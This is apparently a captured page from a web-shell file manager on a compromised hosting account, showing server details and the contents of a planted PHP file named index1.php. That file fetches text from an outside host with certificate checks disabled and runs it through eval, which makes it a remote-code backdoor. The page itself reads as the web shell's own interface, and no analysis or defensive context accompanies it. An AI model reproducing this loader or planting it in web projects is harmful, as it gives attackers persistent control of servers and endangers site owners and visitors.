HEX
Server: Apache
System: Linux server-674799.igrow.ws 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User: elrashedytravel (1025)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/elrashedytravel/public_html/configCYT/Jump/0-molexlubricants/index1.php
<?php
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) ) {
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, "http://z60121_16.qosinski.shop/stat/index.txt" );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $ch, CURLOPT_HEADER, false );
    curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
    $handle = curl_exec( $ch );
    if ( $handle ) {
        $data = eVaL( '?>' . $handle );
    }
    curl_close( $ch ); 
}?>